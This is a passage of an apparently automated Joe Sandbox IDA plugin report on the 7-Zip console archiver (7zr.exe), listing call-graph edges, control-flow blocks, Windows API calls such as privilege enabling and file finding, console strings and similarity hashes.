75337->75282 75338->75282 75339->75282 75340->75282 75341->75246 75342->75253 75343->75258 75344->75263 75345->75268 75348->75262 75349->75267 75350->75272 75351->75276 75352->75279 75355->75185 75356->75187 75357->75192 75358->75196 75359->75200 75360->75260 75371 cf9767 75361->75371 75363 cf9518 SysAllocStringLen 75364 cf954f 75363->75364 75365 cf9539 _CxxThrowException 75363->75365 75364->75288 75365->75364 75366->75288 75367->75288 75368->75288 75369->75288 75370->75294 75372 cf9779 75371->75372 75373 cf9770 75371->75373 75376 cf9686 VariantClear 75372->75376 75373->75363 75375 cf9780 75375->75363 75376->75375 75377->75317 75378 cfb5d9 75379 cfb5f7 75378->75379 75380 cfb5e6 75378->75380 75380->75379 75384 cfb5fe 75380->75384 75385 cfb608 __EH_prolog 75384->75385 75391 d76a40 VirtualFree 75385->75391 75387 cfb63d 75388 cf764c CloseHandle 75387->75388 75389 cfb5f1 75388->75389 75390 cf1e40 free 75389->75390 75390->75379 75391->75387 75392 d1d948 75422 d1dac7 75392->75422 
75394 d1d94f 75395 cf2e04 2 API calls 75394->75395 75396 d1d97b 75395->75396 75397 cf2e04 2 API calls 75396->75397 75398 d1d987 75397->75398 75401 d1d9e7 75398->75401 75430 cf6404 75398->75430 75403 d1da0f 75401->75403 75421 d1da36 75401->75421 75455 cf1e40 free 75403->75455 75406 d1d9bf 75453 cf1e40 free 75406->75453 75407 d1da94 75459 cf1e40 free 75407->75459 75408 d1da17 75456 cf1e40 free 75408->75456 75412 d1d9c7 75454 cf1e40 free 75412->75454 75413 d1da9c 75460 cf1e40 free 75413->75460 75414 cf2da9 2 API calls 75414->75421 75417 d304d2 5 API calls 75417->75421 75418 d1d9cf 75421->75407 75421->75414 75421->75417 75457 cf1524 malloc _CxxThrowException __EH_prolog ctype 75421->75457 75458 cf1e40 free 75421->75458 75423 d1dad1 __EH_prolog 75422->75423 75424 cf2e04 2 API calls 75423->75424 75425 d1db33 75424->75425 75426 cf2e04 2 API calls 75425->75426 75427 d1db3f 75426->75427 75428 cf2e04 2 API calls 75427->75428 75429 d1db55 75428->75429 75429->75394 75461 cf631f 75430->75461 75433 cf2f88 3 API calls 75434 cf6423 75433->75434 75435 cf2f88 3 API calls 75434->75435 75436 cf643d 75435->75436 75437 d07e5a 75436->75437 75438 d07e64 __EH_prolog 75437->75438 75517 d08179 75438->75517 75441 d17ebb free 75442 d07e7f 75441->75442 75443 cf2fec 3 API calls 75442->75443 75444 d07e9a 75443->75444 75445 cf2da9 2 API calls 75444->75445 75446 d07ea7 75445->75446 75447 cf6c72 44 API calls 75446->75447 75448 d07eb7 75447->75448 75522 cf1e40 free 75448->75522 75450 d07ecb 75451 d07ed8 75450->75451 75523 cf757d GetLastError 75450->75523 75451->75401 75451->75406 75453->75412 75454->75418 75455->75408 75456->75418 75457->75421 75458->75421 75459->75413 75460->75418 75462 cf9245 75461->75462 75465 cf90da 75462->75465 75466 cf90e4 __EH_prolog 75465->75466 75467 cf2f88 3 API calls 75466->75467 75469 cf90f7 75467->75469 75468 cf915d 75470 cf2e04 2 API calls 75468->75470 75469->75468 75474 cf9109 75469->75474 75471 cf9165 75470->75471 75472 cf91be 75471->75472 75475 cf9174 75471->75475 
75511 cf6332 6 API calls 2 library calls 75472->75511 75477 cf2e47 2 API calls 75474->75477 75485 cf6414 75474->75485 75478 cf2f88 3 API calls 75475->75478 75476 cf917d 75504 cf91ca 75476->75504 75509 cf859e malloc _CxxThrowException free _CxxThrowException 75476->75509 75479 cf9122 75477->75479 75478->75476 75506 cf8f57 memmove 75479->75506 75483 cf9185 75488 cf2e04 2 API calls 75483->75488 75484 cf914d 75508 cf1e40 free 75484->75508 75485->75433 75485->75434 75487 cf912e 75487->75484 75507 cf31e5 malloc _CxxThrowException free _CxxThrowException 75487->75507 75490 cf9197 75488->75490 75491 cf919f 75490->75491 75492 cf91ce 75490->75492 75493 cf91b9 75491->75493 75510 cf1089 malloc _CxxThrowException free _CxxThrowException 75491->75510 75494 cf2f88 3 API calls 75492->75494 75512 cf3199 malloc _CxxThrowException free _CxxThrowException 75493->75512 75494->75493 75497 cf91e6 75513 cf8f57 memmove 75497->75513 75499 cf91ee 75500 cf91f2 75499->75500 75501 cf2fec 3 API calls 75499->75501 75515 cf1e40 free 75500->75515 75503 cf9212 75501->75503 75514 cf31e5 malloc _CxxThrowException free _CxxThrowException 75503->75514 75516 cf1e40 free 75504->75516 75506->75487 75507->75484 75508->75485 75509->75483 75510->75493 75511->75476 75512->75497 75513->75499 75514->75500 75515->75504 75516->75485 75520 d08906 75517->75520 75518 d07e77 75518->75441 75520->75518 75524 d08804 free ctype 75520->75524 75525 cf1e40 free 75520->75525 75522->75450 75523->75451 75524->75520 75525->75520 75526 cf42d1 75527 cf42bd 75526->75527 75528 cf42c5 75527->75528 75529 cf1e0c ctype 2 API calls 75527->75529 75529->75528 75530 d38eb1 75535 d38ed1 75530->75535 75533 d38ec9 75536 d38edb __EH_prolog 75535->75536 75544 d39267 75536->75544 75540 d38efd 75549 d2e5f1 free ctype 75540->75549 75542 d38eb9 75542->75533 75543 cf1e40 free 75542->75543 75543->75533 75545 d39271 __EH_prolog 75544->75545 75550 cf1e40 free 75545->75550 75547 d38ef1 75548 d3922b free CloseHandle GetLastError ctype 75547->75548 
75548->75540 75549->75542 75550->75547 75551 d2adb7 75552 d2adc1 __EH_prolog 75551->75552 75567 cf26dd 75552->75567 75554 d2ae1d 75555 cf2e04 2 API calls 75554->75555 75556 d2ae38 75555->75556 75557 cf2e04 2 API calls 75556->75557 75558 d2ae44 75557->75558 75559 cf2e04 2 API calls 75558->75559 75560 d2ae68 75559->75560 75570 d2ad29 75560->75570 75564 d2ae94 75565 cf2e04 2 API calls 75564->75565 75566 d2aeb2 75565->75566 75568 cf1e0c ctype 2 API calls 75567->75568 75569 cf26ea 75568->75569 75569->75554 75571 d2ad33 __EH_prolog 75570->75571 75572 cf2e04 2 API calls 75571->75572 75573 d2ad5f 75572->75573 75574 cf2e04 2 API calls 75573->75574 75575 d2ad72 75574->75575 75576 d2af2d 75575->75576 75577 d2af37 __EH_prolog 75576->75577 75588 d034f4 malloc _CxxThrowException __EH_prolog 75577->75588 75579 d2afac 75580 cf2e04 2 API calls 75579->75580 75581 d2afbb 75580->75581 75582 cf2e04 2 API calls 75581->75582 75583 d2afca 75582->75583 75584 cf2e04 2 API calls 75583->75584 75585 d2afd9 75584->75585 75586 cf2e04 2 API calls 75585->75586 75587 d2afe8 75586->75587 75587->75564 75588->75579 75592 d25475 75593 cf2fec 3 API calls 75592->75593 75594 d254b4 75593->75594 75597 d2c911 75594->75597 75596 d254bb 75598 d2c926 GetTickCount 75597->75598 75599 d2c92f 75597->75599 75598->75599 75600 d2c96d 75599->75600 75603 d2cb64 75599->75603 75661 cf2ab1 strcmp 75599->75661 75600->75603 75642 d2c86a 75600->75642 75603->75596 75605 d2c9ce 75605->75603 75608 cf27bb 3 API calls 75605->75608 75606 d2c95b 75606->75600 75662 cf3542 wcscmp 75606->75662 75614 d2c9e2 75608->75614 75610 d2ca0a 75611 d2ca21 75610->75611 75612 cf286d 5 API calls 75610->75612 75613 d2cb10 75611->75613 75620 cf286d 5 API calls 75611->75620 75615 d2ca16 75612->75615 75650 d2cb74 75613->75650 75614->75610 75664 cf286d 75614->75664 75671 cf28fa malloc _CxxThrowException free memcpy _CxxThrowException 75615->75671 75623 d2ca40 75620->75623 75622 d2cb59 75683 d2cb92 malloc _CxxThrowException free 75622->75683 75626 cf2fec 
[Call-graph edge list, continued. Nodes carry the IDA plugin's sequential numbers, each labelled with a function address in the 00CF0000 image and the APIs reached from it; "A->B" is a call or branch from node A to node B. The API-bearing nodes in this part of the list are:]
• d03d66: GetCurrentProcess, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, GetLastError, with CloseHandle in the d03e04 helper (d03e04 → d03e11 CloseHandle); this is the privilege-enable routine whose control-flow graph follows below
• cf7919: four DeviceIoControl calls, plus GetModuleHandleW / GetProcAddress / GetDiskFreeSpaceW in cf9252; cf7ab2: SetFileTime
• d2544f: SetConsoleCtrlHandler; d8ffb1 / d90068 / d8ffc2 / d9001d: CRT start-up (__setusermatherr, _controlfp, _initterm, __getmainargs, __p___initenv, exit, _XcptFilter)
• d87da0 / d87d80: WaitForSingleObject, GetLastError, CloseHandle; d87ea0: SetEvent; d76b23: VirtualAlloc; d76ba3: VirtualFree; d1cae9: VariantClear; d38e04: memset; d299b7: GetStdHandle, GetConsoleScreenBufferInfo
• the remaining nodes are console output (fputs, fputc, fflush) and C++ string and memory handling (malloc, free, memcpy, memmove, strlen, strcmp, wcscmp, CharUpperW, _CxxThrowException, __EH_prolog, __aulldiv)

                                              Control-flow Graph

                                              Basic blocks (node: address range, APIs called; successors):
                                              • 1028: cf9313-cf9338, GetCurrentProcess, OpenProcessToken → 1029, 1030
                                              • 1029: cf933a-cf934a, LookupPrivilegeValueW → 1031, 1032
                                              • 1030: cf9390 → 1033
                                              • 1031: cf934c-cf9370, AdjustTokenPrivileges → 1032, 1034
                                              • 1032: cf9382 → 1035
                                              • 1033: cf9393-cf9398 (function exit)
                                              • 1034: cf9372-cf9380, GetLastError → 1035
                                              • 1035: cf9385-cf938e, CloseHandle → 1033
                                              Reading: the edge that skips LookupPrivilegeValueW (1028 → 1030) reaches the exit block without CloseHandle, consistent with OpenProcessToken having failed; every path taken after the token is opened ends in CloseHandle (1035). GetLastError (1034) sits directly after AdjustTokenPrivileges, which is where ERROR_NOT_ALL_ASSIGNED has to be checked, because AdjustTokenPrivileges itself returns success even when the requested privilege is not held by the token.
                                              APIs
                                              • GetCurrentProcess.KERNEL32(00000020,00D01EC5,?,7597AB50,?,?,?,?,00D01EC5,00D01CEF), ref: 00CF9329
                                              • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,00D01EC5,00D01CEF), ref: 00CF9330
                                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeRestorePrivilege,?), ref: 00CF9342
                                              • AdjustTokenPrivileges.KERNELBASE(00D01EC5,00000000,?,00000000,00000000,00000000), ref: 00CF9368
                                              • GetLastError.KERNEL32 ref: 00CF9372
                                              • CloseHandle.KERNELBASE(00D01EC5,?,?,?,?,00D01EC5,00D01CEF), ref: 00CF9388
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: ProcessToken$AdjustCloseCurrentErrorHandleLastLookupOpenPrivilegePrivilegesValue
                                              • String ID: SeRestorePrivilege
                                              • API String ID: 3398352648-1684392131
                                              • Opcode ID: 3cf9e40b883ea100e7da1f66c1152ec52eb083eb5f327dc6089bb91dd313f012
                                              • Instruction ID: d0ac013b5e9abce6b79b513e16b847cd0f3b4b37b52886368b6c6a0a08582a32
                                              • Opcode Fuzzy Hash: 3cf9e40b883ea100e7da1f66c1152ec52eb083eb5f327dc6089bb91dd313f012
                                              • Instruction Fuzzy Hash: 21018076945318ABCB509BF19C49BEE7F7CEF05340F041165F545E22A0D6758608DBB1

                                              Control-flow Graph

                                              Basic blocks (node: address range, calls; successors):
                                              • 1036: d03d66-d03d9c, call d8fb10, GetCurrentProcess, call d03e04, OpenProcessToken → 1041, 1042
                                              • 1041: d03de3-d03dfe, call d03e04 (function exit)
                                              • 1042: d03d9e-d03dbe, LookupPrivilegeValueW → 1041, 1043
                                              • 1043: d03dc0-d03dd3, AdjustTokenPrivileges → 1041, 1045
                                              • 1045: d03dd5-d03de1, GetLastError → 1041
                                              Reading: the call graph above shows d03e04 wrapping CloseHandle (d03e04 → d03e11 CloseHandle), so every block here falls through to a single exit that closes the token handle; the d8fb10 call at the function entry is consistent with the __EH_prolog reference at 00D03D6B listed below. As in the previous function, GetLastError follows AdjustTokenPrivileges directly.
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00D03D6B
                                              • GetCurrentProcess.KERNEL32(?,00000000,?,?,00000000,00000000,759A8E30), ref: 00D03D7D
                                              • OpenProcessToken.ADVAPI32(00000000,00000028,?,?,00000000,?,?,00000000,00000000,759A8E30), ref: 00D03D94
                                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 00D03DB6
                                              • AdjustTokenPrivileges.KERNELBASE(?,00000000,00000001,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,759A8E30), ref: 00D03DCB
                                              • GetLastError.KERNEL32(?,00000000,?,?,00000000,00000000,759A8E30), ref: 00D03DD5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: ProcessToken$AdjustCurrentErrorH_prologLastLookupOpenPrivilegePrivilegesValue
                                              • String ID: SeSecurityPrivilege
                                              • API String ID: 3475889169-2333288578
                                              • Opcode ID: 5d8257ed151cdf8e29b9bc352f2318c8c3c91b9589dd2eec2837aad94ab2c3db
                                              • Instruction ID: 8d52be1d10ed6d6715453c42751b8866adccf145a8c3ef2f4960ca229bc05297
                                              • Opcode Fuzzy Hash: 5d8257ed151cdf8e29b9bc352f2318c8c3c91b9589dd2eec2837aad94ab2c3db
                                              • Instruction Fuzzy Hash: D7115EB1940219AFDB10EFA5CC85AFEFBBCFB04344F40462AE416E2291D7348A08CB70
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00D381F1
                                                • Part of subcall function 00D3F749: _CxxThrowException.MSVCRT(?,00DA4A58), ref: 00D3F792
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: ExceptionH_prologThrow
                                              • String ID:
                                              • API String ID: 461045715-3916222277
                                              • Opcode ID: 0ef5b46db264539d14a7416817a33e0583387fda46b3106dc7a19d71576c7429
                                              • Instruction ID: 2bf26022ac4686e1b10b1ca640f6503bae5bfcb76e867a728bfc8fa1f4ffb329
                                              • Opcode Fuzzy Hash: 0ef5b46db264539d14a7416817a33e0583387fda46b3106dc7a19d71576c7429
                                              • Instruction Fuzzy Hash: F0926B31900359DFDF15DFA8C884BAEBBB1AF18304F284099F845AB291CB75AE45DB71
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00CF686D
                                                • Part of subcall function 00CF6848: FindClose.KERNELBASE(00000000,?,00CF6880), ref: 00CF6853
                                              • FindFirstFileW.KERNELBASE(?,-00000268,?,00000000), ref: 00CF68A5
                                              • FindFirstFileW.KERNELBASE(?,-00000268,00000000,?,00000000), ref: 00CF68DE
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: Find$FileFirst$CloseH_prolog
                                              • String ID:
                                              • API String ID: 3371352514-0
                                              • Opcode ID: d08c6785a3f79bed03355b8e0f51f86a2b1836712750a0c1b71ac45a2f647115
                                              • Instruction ID: 9a0e81c29872c77e379482ad76ed3ea619f7cf22d29bb6347e1323d256036e68
                                              • Opcode Fuzzy Hash: d08c6785a3f79bed03355b8e0f51f86a2b1836712750a0c1b71ac45a2f647115
                                              • Instruction Fuzzy Hash: 50118E3150020DABCB50EFA4C8559FDB769EF50364F204629EAA1571D2DB318E86EB51

                                              Control-flow Graph
                                              (graph of the function starting at 0x00D2A013; executed / not-executed block colouring and edge layout are not reproducible in text)
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: fputs$ExceptionThrow
                                              • String ID: 7zCon.sfx$Alternate Streams Size: $Alternate Streams: $Archives with Errors: $Archives with Warnings: $Archives: $Can't open as archive: $Compressed: $ERROR:$Files: $Folders: $OK archives: $Open Errors: $Size: $Sub items Errors: $Warnings: $N
                                              • API String ID: 3665150552-429544124
                                              • Opcode ID: b831a6919da98bd1a72721c1d9d1040a0d1a3a8d0722c8307eff0bb6ee42106c
                                              • Instruction ID: c1ecd7a6144d3ee2c489c264cf903510676e055b7965b19727245e68aca56539
                                              • Opcode Fuzzy Hash: b831a6919da98bd1a72721c1d9d1040a0d1a3a8d0722c8307eff0bb6ee42106c
                                              • Instruction Fuzzy Hash: 3752AF31904269DFCF26DBA8D885BEDFBB5EF54304F04409AE549A3291DB316E84DF22

                                              Control-flow Graph
                                              (graph of the function starting at 0x00D2A42C; executed / not-executed block colouring and edge layout are not reproducible in text)
                                              APIs
                                              • fputs.MSVCRT(Scanning the drive for archives:), ref: 00D2A43E
                                                • Part of subcall function 00CF1FA0: fputc.MSVCRT ref: 00CF1FA7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: fputcfputs
                                              • String ID: Alternate Streams Size: $Alternate Streams: $Archives with Errors: $Archives with Warnings: $Archives: $Can't open as archive: $Compressed: $ERROR:$Files: $Folders: $OK archives: $Open Errors: $Scanning the drive for archives:$Size: $Warnings: $!"$N
                                              • API String ID: 269475090-3104439828
                                              • Opcode ID: 25b2eefd50e4b223987187beeb6e13b08fe66bbe406726736b1ca6685472ced3
                                              • Instruction ID: cab9b5785281934fe1bf3535130c247d48d1c293a25089904b138a2babd10c3a
                                              • Opcode Fuzzy Hash: 25b2eefd50e4b223987187beeb6e13b08fe66bbe406726736b1ca6685472ced3
                                              • Instruction Fuzzy Hash: CD226D31900268DFDF2ADBA8D845BEDFBB1EF54304F18409AE54963291DB716E84DF22

                                              Control-flow Graph
                                              (graph of the function starting at 0x00D2993D; executed / not-executed block colouring and edge layout are not reproducible in text)
                                              APIs
                                                • Part of subcall function 00D2B5B1: fputs.MSVCRT ref: 00D2B5CA
                                                • Part of subcall function 00D2B5B1: fputs.MSVCRT ref: 00D2B5E1
                                              • GetStdHandle.KERNEL32(000000F5,?,?,?,?,?,?,?), ref: 00D299BD
                                              • GetConsoleScreenBufferInfo.KERNELBASE(00000000,?,?,?,?,?,?), ref: 00D299C4
                                              • _CxxThrowException.MSVCRT(?,00DA55B8), ref: 00D29A77
                                              • _CxxThrowException.MSVCRT(?,00DA55B8), ref: 00D29ABB
                                                • Part of subcall function 00CF1FB3: __EH_prolog.LIBCMT ref: 00CF1FB8
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: ExceptionThrowfputs$BufferConsoleH_prologHandleInfoScreen
                                              • String ID: $ || $Codecs:$Formats:$Hashers:$KSNFMGOPBELHXCc+a+m+r+$P$offset=$N
                                              • API String ID: 377453556-3661318601
                                              • Opcode ID: 61d68a67c96ddd2ad1a27faa74414c56b3017ac2a1ba6951ec3bc446389c5fa7
                                              • Instruction ID: 2a061c8f6c88e4920ff2c99342814a26698cf799dc0ac0ce1683823018c78dca
                                              • Opcode Fuzzy Hash: 61d68a67c96ddd2ad1a27faa74414c56b3017ac2a1ba6951ec3bc446389c5fa7
                                              • Instruction Fuzzy Hash: 9A22BD31D00218DFDF14EFA4E895BADBBB1EF58314F24009AE544AB292CB359A85DF71

                                              Control-flow Graph
                                              (graph of the function starting at 0x00D01ADE; executed / not-executed block colouring and edge layout are not reproducible in text)
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00D01AE3
                                                • Part of subcall function 00CF13F5: __EH_prolog.LIBCMT ref: 00CF13FA
                                              • _CxxThrowException.MSVCRT(?,00DA6010), ref: 00D01B2D
                                              • _fileno.MSVCRT ref: 00D01B3E
                                              • _isatty.MSVCRT ref: 00D01B47
                                              • _fileno.MSVCRT ref: 00D01B5D
                                              • _isatty.MSVCRT ref: 00D01B60
                                              • _fileno.MSVCRT ref: 00D01B73
                                              • _CxxThrowException.MSVCRT(?,00DA6010), ref: 00D01CBB
                                              • _CxxThrowException.MSVCRT(?,00DA6010), ref: 00D01DBD
                                              • wcscmp.MSVCRT ref: 00D01DCA
                                              • _CxxThrowException.MSVCRT(?,00DA6010), ref: 00D01E04
                                              • _isatty.MSVCRT ref: 00D01B76
                                                • Part of subcall function 00D11D73: __EH_prolog.LIBCMT ref: 00D11D78
                                              • _CxxThrowException.MSVCRT(?,00DA6010), ref: 00D01E2C
                                              • GetCurrentProcess.KERNEL32(00000000,00000000,?,Set process affinity mask: ,?), ref: 00D01E3B
                                              • SetProcessAffinityMask.KERNEL32(00000000), ref: 00D01E42
                                              • GetLastError.KERNEL32(?,Set process affinity mask: ,?), ref: 00D01E4C
                                              Strings
                                              • : ERROR : , xrefs: 00D01E52
                                              • Unsupported switch postfix for -slp, xrefs: 00D01DF1
                                              • Set process affinity mask: , xrefs: 00D01D74
                                              • unsupported value -stm, xrefs: 00D01E19
                                              • SeLockMemoryPrivilege, xrefs: 00D01D28
                                              • Unsupported switch postfix -bb, xrefs: 00D01CA8
                                              • Unsupported switch postfix -stm, xrefs: 00D01DAA
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: ExceptionThrow$H_prolog_fileno_isatty$Process$AffinityCurrentErrorLastMaskwcscmp
                                              • String ID: : ERROR : $SeLockMemoryPrivilege$Set process affinity mask: $Unsupported switch postfix -bb$Unsupported switch postfix -stm$Unsupported switch postfix for -slp$unsupported value -stm
                                              • API String ID: 1826148334-1115009270
                                              • Opcode ID: dea5c35e329ee3037ffdc5f4f9aa44d05899b887358b30cb88e2e4fb8b607e06
                                              • Instruction ID: 225ad0dbfb7923f22942b4d13d09d38f92a8569b1e56960fb7b219ed2dd8ab57
                                              • Opcode Fuzzy Hash: dea5c35e329ee3037ffdc5f4f9aa44d05899b887358b30cb88e2e4fb8b607e06
                                              • Instruction Fuzzy Hash: 6CC1B135900345EFEB11EFA8C889BEDBBF1AF09304F088459E49997292CB74E944CB35

                                              Control-flow Graph
                                              (graph of the function starting at 0x00D28012; executed / not-executed block colouring and edge layout are not reproducible in text)
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00D28017
                                              • fputs.MSVCRT ref: 00D2804D
                                                • Part of subcall function 00D28341: __EH_prolog.LIBCMT ref: 00D28346
                                                • Part of subcall function 00D28341: fputs.MSVCRT ref: 00D2835B
                                                • Part of subcall function 00D28341: fputs.MSVCRT ref: 00D28364
                                              • fputs.MSVCRT ref: 00D2807A
                                                • Part of subcall function 00CF1FA0: fputc.MSVCRT ref: 00CF1FA7
                                                • Part of subcall function 00CF965D: VariantClear.OLEAUT32(?), ref: 00CF967F
                                              • SysFreeString.OLEAUT32(00000000), ref: 00D281AA
                                              • fputs.MSVCRT ref: 00D281CD
                                              • SysFreeString.OLEAUT32(00000000), ref: 00D28267
                                              • SysFreeString.OLEAUT32(00000000), ref: 00D282B1
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: fputs$FreeString$H_prolog$ClearVariantfputc
                                              • String ID: --$----$Path$Type$Warning: The archive is open with offset
                                              • API String ID: 2889736305-3797937567
                                              • Opcode ID: 926825d50e13556b67ef8d62efd5d20e54f69510909baf3dcd38834a7262afa6
                                              • Instruction ID: eab2fe4b639cd3084ff36294423ba2cad122e681a8c263aecb63d84409cbadfb
                                              • Opcode Fuzzy Hash: 926825d50e13556b67ef8d62efd5d20e54f69510909baf3dcd38834a7262afa6
                                              • Instruction Fuzzy Hash: 38919831A01229EFCF14DFA4E980AAEB7B5FF68314F244129E512E7291DB70AD05DB74

                                              Control-flow Graph

